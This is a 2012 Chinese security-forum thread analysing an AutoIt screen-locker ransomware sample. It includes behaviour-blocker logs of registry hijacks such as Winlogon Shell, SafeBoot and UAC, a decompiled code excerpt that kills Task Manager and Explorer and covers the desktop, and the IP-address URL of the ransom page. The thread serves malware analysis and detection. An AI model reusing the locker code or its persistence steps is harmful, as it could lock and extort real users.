锁屏样本

hddu

2012-07-02 18:30:49    修改注册表内容      操作:使用任务隔离区操作
进程路径:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:Shell
更改后:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
更改前:Explorer.exe
触发规则:应用程序规则->WinLogon设置->?:\*->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


2012-07-02 18:30:49    修改注册表内容      操作:阻止
进程路径:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Control\SafeBoot
注册表名称:AlternateShell
更改后:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
更改前:cmd.exe
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\Control\SafeBoot


2012-07-02 18:30:49    创建注册表值      操作:阻止
进程路径:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Restrictions
注册表名称:NoBrowserContextMenu
触发规则:所有程序规则->IE浏览器设置->*\SOFTWARE\Policies\Microsoft\Internet Explorer\Restrictions


2012-07-02 18:30:49    创建注册表值      操作:使用任务隔离区操作
进程路径:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
注册表名称:NoViewContextMenu
触发规则:所有程序规则->资源管理器->*\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer


2012-07-02 18:30:49    创建注册表值      操作:使用任务隔离区操作
进程路径:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
注册表名称:EnableLUA
触发规则:所有程序规则->其他重要项->*\SOFTWARE\Microsoft\Windows\CurrentVersion\policies*


2012-07-02 18:30:49    创建文件      操作:阻止并结束进程
进程路径:F:\virus\DOWNLOADER（14）\OK_DOWNLOADER (14).exe
文件路径:C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\OK_DOWNLOADER (14).exe.lnk
触发规则:所有程序规则->Documents and Settings设置（二）->?:\Documents and Settings\*\*菜单\程序\启动\*.*.lnk

消停

蓝核 发表于 2012-7-2 17:52
虽然FSCS杀了……但是我还是好奇为什么卡巴和BD能杀……大病毒库的优势么

毒库大，启发也很强！

liwnpin

ESS杀

chenc4

Autoit写的？反了它~

锁屏部分代码如下：

1. 
   
2. $SHELL = REGREAD ( "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" , "Shell" )
   
3. IF $SHELL <> @SCRIPTFULLPATH THEN
   
4. FILECREATESHORTCUT ( @SCRIPTFULLPATH , @STARTUPDIR & "" & @SCRIPTNAME & ".lnk" )
   
5. ENDIF
   
6. $OIE = OBJCREATE ( "Shell.Explorer.2" )
   
7. $HGUI = GUICREATE ( "" , @DESKTOPWIDTH , @DESKTOPHEIGHT , 0 , 0 , $WS_POPUP + $WS_EX_TOOLWINDOW , $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW )
   
8. WHILE 1
   
9. $DIFF = TIMERDIFF ( $TIMER )
   
10. IF $DIFF > 150 THEN
    
11. IF PROCESSEXISTS ( "taskmgr.exe" ) THEN
    
12. PROCESSCLOSE ( "taskmgr.exe" )
    
13. ENDIF
    
14. IF PROCESSEXISTS ( "explorer.exe" ) THEN
    
15. RUN ( @COMSPEC & " /c " & "taskkill /f /im explorer.exe" , "" , @SW_HIDE )
    
16. ENDIF
    
17. $DIFF = 0
    
18. $TIMER = TIMERINIT ( )
    
19. ENDIF
    
20. WINSETONTOP ( $HGUI , "" , 1 )
    
21. WINACTIVATE ( $HGUI )
    
22. WEND

复制代码

简而言之就是每150ms检测一下任务管理器和explorer进程在不在，在的话就杀掉，所以任务管理器也掉不出来，桌面也显示不出来了，还把自己加到启动项里。另外还创建一个和桌面一样大的控件来覆盖住桌面，恶心啊


另外貌似还开了一个IE进程，访问http://95.172.154.96/spielberg/start.php. 从页面上看，说是因为下载了盗版音乐触犯了版权法，要交50欧元才能解锁电脑。 钓鱼网站啊。。

消停

chenc4 发表于 2012-7-2 19:20
Autoit写的？反了它~

锁屏部分代码如下：

好有趣的病毒

绅博周幸

Bitdefender blocked this page


The page you are trying to access contains Trojan.AutoIt.AVA.

zaqwe3008

2012-7-4 22:28:24    修改注册表值    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
值: C:\Downloads\OK_DOWNLOADER (14).exe
规则: [注册表组]WinLogon -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon; shell

2012-7-4 22:28:27    修改注册表值    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell
值: C:\Downloads\OK_DOWNLOADER (14).exe
规则: [注册表组]系统安全设置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\*controlset*\Control\Safeboot*

2012-7-4 22:28:31    修改注册表值    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoViewContextMenu
值: 0x00000001(1)
规则: [注册表组]系统风险设置 -> [注册表]*\SOFTWARE\Microsoft\Windows\CurrentVersion\policies*

2012-7-4 22:28:32    修改注册表值    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA
值: 0x00000000(0)
规则: [注册表组]系统风险设置 -> [注册表]*\SOFTWARE\Microsoft\Windows\CurrentVersion\policies*

2012-7-4 22:28:37    创建文件    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\OK_DOWNLOADER (14).exe.lnk
规则: [文件组]全局规则 -> [文件]?:\*

2012-7-4 22:29:15    访问网络    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: TCP [本机 : 4340] ->  [95.172.154.96 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2012-7-4 22:29:15    创建新进程    阻止
进程: c:\downloads\ok_downloader (14).exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /c taskkill /f /im explorer.exe
规则: [应用程序组]命令行 -> [应用程序]* -> [子应用程序]?:\windows\system32\cmd.exe

2012-7-4 22:29:24    底层键盘操作    阻止并结束进程
进程: c:\downloads\ok_downloader (14).exe
规则: [应用程序]*

   

港岛妹妹

入侵：        Win32/LockScreen.ALJ 木馬
註解:        這網頁的存取已被ESET Endpoint Security攔截。

xiaoyaosanren